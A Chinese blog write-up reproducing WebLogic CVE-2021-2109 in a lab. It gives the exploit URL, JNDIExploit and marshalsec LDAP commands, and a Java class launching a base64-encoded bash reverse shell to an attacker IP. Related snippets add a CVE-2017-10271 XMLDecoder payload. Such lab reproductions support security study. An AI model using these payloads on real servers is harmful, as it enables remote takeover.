Weblogic 远程代码执行漏洞:CVE-2021-2109复现

最新推荐文章于 2024-03-01 14:01:47 发布
置顶 最新推荐文章于 2024-03-01 14:01:47 发布
阅读量3.7k 收藏 7
点赞数 3
分类专栏: 漏洞学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jietewang/article/details/113099976
版权

目录

 

前言

1. 环境搭建

2. 漏洞利用

2.1 命令执行

2.2 反弹shell

3. 总结

前言

什么是LDAPLightweight Directory Access Protocol轻量目录访问协议,基于X.500协议,相对简单且支持定制。于X.500不同的是LDAP支持TCP/IP。

本文主要复现编号为CVE-2021-2109Weblogic JNDI注入远程命令执行漏洞,该漏洞风险为“高”。

影响版本:Weblogic Server 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

1. 环境搭建

本次实验使用的靶机环境是以前安装,如想了解环境搭建请访问该链接。也可以自行瞎搞,教程是很多的找到适用的就好。

需要注意的是,出现以下界面只需要稍加等待即可。

安装成功界面如下:

 访问链接:http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal

2. 漏洞利用

2.1 命令执行

能成功访问uri(/console/css/%252e%252e%252f/consolejndi.portal),且在受影响范围内,在该地址下载漏洞攻击需要的 LDAP启动脚本到服务端,使用命令启动。

java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx (服务器地址)

/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)

注意:ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho 这里 LDAP服务器地址第三个分隔符号为 ;

执行命令如下:

2.2 反弹shell

在攻击机上起一个临时http服务

python -m SimpleHTTPServer 80

是要javac 将下面java代码编译成.class 

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
   public Exploit() throws Exception {
       //Process p = Runtime.getRuntime().exec(newString[]{"cmd","/c","calc.exe"});
     Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c",'YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwNC4xMzUvOTk5OSAwPiYx'|base64 -d |bash"});
       InputStream is = p.getInputStream();
       BufferedReader reader = new BufferedReader(new InputStreamReader(is));

       String line;
       while((line = reader.readLine()) != null) {
           System.out.println(line);
       }

       p.waitFor();
       is.close();
       reader.close();
       p.destroy();
    }

   public static void main(String[] args) throws Exception {
    }
}

 启动exphttp服务启动ldap服务

java -cpmarshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip.ip.ip.ip/\#Exploit 9998 

 /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.204;135:9999/s4dzak;AdminServer%22)

反弹失败,算了,我摊牌了不搞了。

3. 总结

启动ldap是异地也可以。

java的版本对实验的结果有影响,具体是啥以后再试。

下班!!!!!!!!!!!!

参考文章

https://mp.weixin.qq.com/s/TMgmrSr5nZC2WNvfiUJ97A

https://blog.csdn.net/m0_46257936/article/details/112984836

Jietewang
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
复现CVE-2021-2109 (Weblogic Server远程代码执行漏洞)
记录并分享学习安全的知识点..
01-19 3872
一、漏洞介绍 2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 3.6.0.0 WebLogic 1.3.0.0 WebLogic 2.1.3.0 WebLogic 2.1.4.0 漏洞判别方式:http://x.x.x.x:7001/conso
CVE-2021-2109Weblogic Server远程代码执行漏洞验证及修复
weixin_38896449的博客
03-25 1580
weblogic 未授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 2021年1月20日,Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。在CVE-2021-2109漏洞中,攻击者可构造恶意请求,造成JNDI注入、执行任意代码,从而控制服务器。 2.影响版本 Weblogic Server 10
oracle11g远程命令执行漏洞,漏洞应急|Oracle Weblogic Server远程代码执行漏洞CVE-2021-2109)...
weixin_32958777的博客
04-03 838
近日,锐捷网络CERT安全应急响应团队关注到Oracle官方发布了2021年1月关键补丁更新公告,该补丁中修补了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。在CVE-2021-2109漏洞中,攻击者可构造恶意请求,造成JNDI注入、执行任意代码,从而控制服务器。针对以上漏洞,锐捷安全能够进行漏洞扫描与检测,并做安全防护。漏洞复现环境:We...
Weblogic常见漏洞详解
最新发布
m0_64481831的博客
03-01 1517
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、未授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
CVE-2021-2109 Weblogic Server远程代码执行漏洞
m0_56642842的博客
06-24 3068
0x00 简介 WebLogic是美国甲骨文公司出品的一个application server(应用服务器),确切的说是一个基于JAVAEE架构的中间件,WebLogic主要用于开发、继承、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 0x01 漏洞概述 CVE-2021-2109是存在于WebLogic Server的console中的一个远程代码执行漏洞,经过身份验证的攻击者可以直接通过JNDI远程执行命令或者注入代码,可以配合CVE-2020-14882未授权漏洞执行任意
CVE-2021-2109 Weblogic Server远程代码执行
thelostworld
01-21 4370
CVE-2021-2109 Weblogic远程代码执行 ​ 一、漏洞简介 Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0..
CVE-2021-2109 WebLogic JNDI 注入
合天网安学院
03-02 382
0x01 前言学习一下 WebLogic JNDI 注入 RCE(CVE-2021-2109)0x02 环境搭建和之前 WebLogic 的环境搭建是一致的,本文不再赘述。不过值得一提的是,我的 weblogic 版本是 10.3.6;需要手动添加\server\lib\consoleapp\webapp\WEB-INF\lib\console.jar到依赖里面0x03 漏洞分析与复现漏洞影响...
Weblogic Server远程代码执行漏洞CVE-2021-2109复现
yy
03-03 6770
目录 一. 漏洞描述 二. 影响版本 三. 测试环境搭建 四. 漏洞复现 1. 远程命令执行 2. 反弹shell 五. 漏洞修复 六. 漏洞检测POC 一. 漏洞描述 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应.
CVE漏洞复现-CVE-2021-2109 Weblogic Server远程代码执行
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-06 751
2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109Server远程代码执行漏洞在内的多个高危严重漏洞CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。该漏洞Weblogic远程代码执行漏洞,主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行,危险等级高。
oracle应急响应,漏洞应急|Oracle Weblogic Server远程代码执行漏洞CVE-2021-2109
weixin_39780260的博客
04-06 502
近日,锐捷网络CERT安全应急响应团队关注到Oracle官方发布了2021年1月关键补丁更新公告,该补丁中修补了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。在CVE-2021-2109漏洞中,攻击者可构造恶意请求,造成JNDI注入、执行任意代码,从而控制服务器。针对以上漏洞,锐捷安全能够进行漏洞扫描与检测,并做安全防护。漏洞复现环境:We...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
20180717官网发布Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)漏洞修复补丁
Weblogic反序列化远程代码执行漏洞(CVE-2018-2628) 补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞,这个是weblogic12.1.3.0 版本的补丁包,有需要的可以下载
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server。 成功攻击此漏洞可能导致Oracle WebLogic Server的接管。 CVSS 3.1基本分数7.2(对机密性,完整性和可用性的影响)。 CVSS向量:(CVSS:3.1 / AV:N / AC:L / PR:H / UI:N / S:U / C:H / I:H / A:H) 使适应 需要登录验证 如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
腾讯蓝军安全通告:WebLogic远程代码执行漏洞(CVE-2020-14645).pdf
09-18
腾讯蓝军安全通告:WebLogic远程代码执行漏洞(CVE-2020-14645) 安全建设 安全 安全众测 开发安全 网络与基础架构安全
复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞
Jietewang的博客
12-19 8509
复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞 目录 前言 漏洞原理 影响范围 环境搭建&漏洞复现 使用工具JNDIExploit-1.2-SNAPSHOT.jar 前言 近期Apache Log4j2被暴露了一个严重的远程代码执行安全漏洞CVE-2021-44228),有严重的安全风险。Apache Log4j2是一款优秀的Java日志框架, 被广泛地应用在中间件、开发框架与Web应用中。2021年11月24日,阿里云安全团队向apache官方.
cve-2017-10271漏洞复现
06-28
### 回答1: CVE-2017-10271漏洞是Oracle WebLogic Server中的一个远程代码执行漏洞。攻击者可以通过发送特制的HTTP请求来利用该漏洞,从而在受影响的系统上执行任意代码。该漏洞已经被公开披露,并且已经有一些工具可以用来复现漏洞。但是,我们不建议未经授权的人员进行漏洞复现,因为这可能会导致系统被攻击者入侵。如果您需要测试您的系统是否受到该漏洞的影响,请咨询安全专家或厂商提供的安全补丁。 ### 回答2: CVE-2017-10271漏洞是Oracle WebLogic Server的一个远程代码执行漏洞,攻击者可以通过构造特定的HTTP请求来向受影响的WebLogic服务器发送恶意代码,在未经授权的情况下执行任意命令或获取服务器操作权限。 漏洞复现需要以下步骤: 1. 确定漏洞影响的WebLogic版本,CVE-2017-10271漏洞影响的版本为12.1.2.0、12.1.3.0、12.2.1.0、12.2.1.1和12.2.1.2,若WebLogic版本符合以上版本则可以进行后续漏洞复现操作。 2.通过漏洞利用工具Metasploit或手工构造特定的HTTP请求向受影响的WebLogic服务器发送恶意代码,触发漏洞远程代码执行。 3.构造特定的HTTP请求需要以下信息: - 目标WebLogic服务器的IP地址和端口号。 - WebLogic管理员账户的用户名和密码,用于获取控制台访问权限。 - 漏洞利用代码,用于构造HTTP请求并发送到目标WebLogic服务器。 其中,漏洞利用代码结构大致如下: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: target_weblogic_server_ip:target_port Content-Type: text/xml; charset=utf-8 Content-Length: 800 <?xml version="1.0" encoding="UTF-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo "";whoami;id;uname -a;echo "> /tmp/shell;sudo chmod 777 /tmp/shell;/tmp/shell</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> 这段代码用于请求WebLogic服务器上的CoordinatorPortType服务,执行恶意代码,获取远程服务器的操作权限。其中,</string>字符串后面的内容是要在目标服务器上执行的命令。 4.成功复现漏洞后,攻击者可以通过远程命令执行获取服务器操作权限,对受影响的服务器进行攻击、篡改或窃取敏感数据等恶意行为。 因此,WebLogic管理员应当及时采取措施,升级至最新版本,关闭不必要的端口,增强安全性,以保护WebLogic服务器不受恶意攻击。 ### 回答3: CVE-2017-10271是一个Oracle WebLogic Server中的远程执行代码漏洞漏洞影响Oracle WebLogic Server 10.3.6.0、12.1.3.0、12.2.1.1和12.2.1.2版本。 漏洞复现步骤如下: 步骤一:下载漏洞复现工具 首先要下载漏洞复现工具weblogic-CNVD-2019-48814: git clone https://github.com/tdy218/OracleWeblogic-CNVD-C-2019-48814.git 步骤二:搭建漏洞环境 安装Oracle WebLogic Server 12.2.1.3.0,安装过程略过。在安装完成后,启动Oracle WebLogic Server管理服务: ${ORACLE_HOME}/user_projects/domains/base_domain/bin/startWebLogic.sh 启动管理服务后,访问http://localhost:7001/console,进入控制台界面,输入管理员账号密码,进入控制台主页。 步骤三:运行漏洞利用脚本 进入weblogic-CNVD-2019-48814目录,运行poc.py脚本,如下所示: python poc.py http://localhost:7001 begin ${arbitary command} 其中,http://localhost:7001是WebLogic Server地址,${arbitary command}是任意需要执行的命令,例如: python poc.py http://localhost:7001 begin ls 上述命令将列出当前目录下的文件列表。 漏洞利用成功后,可以看到攻击者执行的命令结果。 除了使用上述脚本之外,攻击者还可以手动利用该漏洞,具体步骤可以查看漏洞详情。 总结: CVE-2017-10271漏洞是一种影响Oracle WebLogic Server的远程执行代码漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。为了防止该漏洞的攻击,我们可以进行以下措施: 1. 及时升级Oracle WebLogic Server版本,以防止攻击者利用漏洞; 2. 禁用T3协议,仅允许HTTPS连接; 3. 配置防火墙,限制WebLogic Server管理服务的访问来源; 4. 运行安全软件,及时发现漏洞和攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值